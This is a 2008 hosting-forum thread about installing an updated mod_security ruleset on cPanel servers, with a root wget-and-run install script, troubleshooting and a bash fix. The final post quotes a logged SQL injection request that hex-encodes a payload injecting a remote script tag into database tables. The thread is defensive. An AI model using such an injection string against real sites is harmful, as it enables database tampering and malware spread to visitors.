Updated mod_sec rules

**p0liX** · 07-09-2008 10:12 AM

We've updated the mod_security rules on 403security.org to the latest set of non-subscription based rules released by gotroot.com. I've tested the rules thoroughly and ensured that the ruleset is compatible with cPanel and it's applications and modified any rules that required tweaking.

The new ruleset includes RBL rules, Whitelisting, Exclusion Rules, Malware blacklisting, Pre-defined Malware blacklist, Web Application protection, Bad Useragent Signature blocking, Anti-spam Signatures, Pre-defined Anti-spam blacklist, Enhanced Apache 2.x rules, Anti Rootkit Signatures, "Google Hacks" signatures, and Just In Time Patches.

I've also created a script to make the installation of the rules much easier. Follow the steps below to download the install script and enable the rules.

1. Run /scripts/easyapache and follow the on screen menu to enable the mod_security module within Apache 2.x. (This installs mod_security 2.5.5 which is required for this ruleset)
2. As root, run "wget -O /root/install_modsec_rules http://403security.org/modsec/install_modsec_rules"
3. As root, run "sh /root/install_modsec_rules" and follow the on screen instructions.

The script was a quick, last minute thing, so let me know if you run into problems or would like to see enhancements with it. Also, let me know if you have an valid function and/or application that is being blocked by these rules and I will work to modify the ruleset to allow proper functionality, while keeping a secure set of rules in place.

UPDATE:
v1.3
I've modified the installation script a bit to automatically check for a valid Apache configuration before requesting a restart.
You can now hit enter to automatically set the default rule location
The includes are configured within the default config file which shows within the Mod_security interface within WHM. This allows the capability to enable or disable a complete set of rules from within the WHM interface.
Added better functionality when choosing the default data directory

Please email any enhancement requests to todd@403security.org

**kctt** · 07-10-2008 02:18 AM

Get 406 Not Acceptable error on the home page of 403security.org

I have a question about mod_security.

It's easy to block c99 shell as it uses URL parameters but r57 uses POST

I try to use ARGS and block "/home/" but it doesn't seem to work.

Do you know how to block web page when a string is matched in POST data.

Thanks in advanced.

**hydra** · 07-10-2008 04:20 AM

Hi p0liX.

i just followed your instructions.
No problems so far. I will let you know if something goes wrong.

Thank you.

Ronald.

**richenou** · 07-10-2008 08:41 AM

hi
I tested it but it failed:

15:40:32 (63.0 KB/s) - `/tmp/modsec2.conf.gz' saved [430/430]

Unpacking configuration file
Backing up current configuration
Testing configuration to be sure there are no errors

Apache Configuration FAILED!

Restoring backup configuration file
Moved failed configuration to /usr/local/apache/conf/modsec2.conf.bad
Check the error above and resolve any conflicts before attempting the installation again
Cleaning up
Installation complete
root@max9 [~]# cat /usr/local/apache/conf/modsec2.conf.bad
LoadFile /opt/xml2/lib/libxml2.so
LoadFile /opt/lua/lib/liblua.so
LoadModule security2_module modules/mod_security2.so

<IfModule mod_security2.c>
SecRuleEngine On
# See http://www.modsecurity.org/documenta...ion-Matrix.pdf
# "Add the rules that will do exactly the same as the directives"
# SecFilterCheckURLEncoding On
# SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/modsec_audit.log
SecDebugLog logs/modsec_debug_log
SecDebugLogLevel 0
SecDefaultAction "phase:2,deny,log,status:406"
SecRule REMOTE_ADDR "^127.0.0.1$" nolog,allow
#Include "/usr/local/apache/conf/modsec2.user.conf"
Include /usr/local/apache/conf/modsec_rules/*.conf
</IfModule>

Server version: Apache/2.0.63
Server built: Jul 10 2008 14:50:53
Cpanel::Easy::Apache v3.2.0 rev4341

help?

**p0liX** · 07-10-2008 08:44 AM

Hmm, looks like the config tests failed, but it didn't give the error as it is supposed to.

Can you email the entire output from the installation to todd@403security.org?

**p0liX** · 07-10-2008 09:42 AM

Originally Posted by kctt

Get 406 Not Acceptable error on the home page of 403security.org

I have a question about mod_security.

It's easy to block c99 shell as it uses URL parameters but r57 uses POST

I try to use ARGS and block "/home/" but it doesn't seem to work.

Do you know how to block web page when a string is matched in POST data.

Thanks in advanced.

This should be resolved, please attempt the installation again.

**LBJ** · 07-10-2008 11:00 PM

First off, thanks very much p0liX. I haven't tested the rules themselves yet, but it's excellent that you've made your work available.

Originally Posted by richenou

I tested it but it failed:

I'm guessing you accepted the default location by entering a blank. That would take you to...

Code:

else
        echo "Nothing was entered, Using default directory /usr/local/apache/conf/modsec_rules"
        RULEDIR="/usr/local/apache/conf/modsec_rules"
        if [ -d $RULEDIR ]; then
                echo "Directory already exists.  Backing up current directory"
                mv $RULEDIR $RULEDIR.`date +%m%d%Y-%H%M`
                mkdir $RULEDIR
                if [ -d $RULEDIR ]; then
        	        echo "Directory created successfully"
                else
                        echo "Directory creation failed."
                        echo "Installation aborted"
                        exit 0
                        fi
                fi
fi

That logic is used when you accept the default destination path by entering a blank. It doesn't handle the situation where the folder doesn't already exist. It only creates the folder after an existing folder has been moved. The creation logic is incorrectly contained in the same if fi block. I think p0liX wanted something more like...

Code:

else
        echo "Nothing was entered, Using default directory /usr/local/apache/conf/modsec_rules"
        RULEDIR="/usr/local/apache/conf/modsec_rules"
        if [ -d $RULEDIR ]; then
                echo "Directory already exists.  Backing up current directory"
                mv $RULEDIR $RULEDIR.`date +%m%d%Y-%H%M`
        fi
        mkdir $RULEDIR
        if [ -d $RULEDIR ]; then
                echo "Directory created successfully"
        else
                echo "Directory creation failed."
                echo "Installation aborted"
                exit 0
        fi
fi

That should correct it.

Regards,

LBJ

**p0liX** · 07-11-2008 06:09 AM

Thanks for the suggestion. I've uploaded v1.3 of the install script which handles the default directory better as well as a couple other small improvements.

**LBJ** · 07-11-2008 07:38 AM

Originally Posted by p0liX

Thanks for the suggestion. I've uploaded v1.3 of the install script which handles the default directory better as well as a couple other small improvements.

That's looking very nice now and the rules are working well without causing issues for CPanel or any addons.

Thanks very much for making your project available for us.

Regards,

LBJ

**p0liX** · 07-11-2008 07:49 AM

Thanks for the feedback. If anyone does find a problem with a feature not working or an application hitting a rule, please let me know and send log information so I can tweak the ruleset a bit more. I won't be able to test every scenario out there so any feedback would be appreciated.

**websnail.net** · 08-08-2008 07:27 AM

Originally Posted by LBJ

That's looking very nice now and the rules are working well without causing issues for CPanel or any addons.

Thanks very much for making your project available for us.

Indeed... Thanks multiplied here too... Very useful indeed...

Have you considered some form of automation for downloading the latest available rules and even one for those with a subscription?

Might be worth a play

**cele303** · 08-13-2008 02:09 AM

Thanks p0liX , works great

**3guys** · 08-16-2008 11:33 PM

The site has been down all day, anyone have the rules you can send me?

Mike
qdo69 AT gmail.com

**Mat-d-rat** · 08-18-2008 11:26 AM

Still down, I wanted to update my rules as well...

**mohit** · 08-19-2008 03:25 PM

why 403security.org not working since few days ?

i found this name recently at another forum, and don't know where to find ruleset so i can safely move to Apache 2.x

Most of attacks iam getting recently on Apache 1.3x are something like

hostname "www.sxxxxxx.org"] [uri "/album/?p=30';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(034C415245204054207661726617263686172283430303029204445434C415245205461626C655F437572736F7220437970653D3939206F7220622E78747970653D3335206F750494E544F2040542C40432057484974206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687477777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726973C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040TRUNCATED-LONG-TEXT-LONG-TEXT2%20AS%20CHAR(4000));ExEC(@S);"]

what kind of exploit is this, although my gotroot ruleset is blocking it, but i get 50+ such attempts every few hours.

LinkBack

Thread Tools

Updated mod_sec rules

Updated mod_sec rules

mod_sec rules (where to get the best version)

Can someone help with mod_sec rules and an application I am trying to run?

Who writes and maintains the default WHM mod_sec rules?

mod_sec rules to drop this...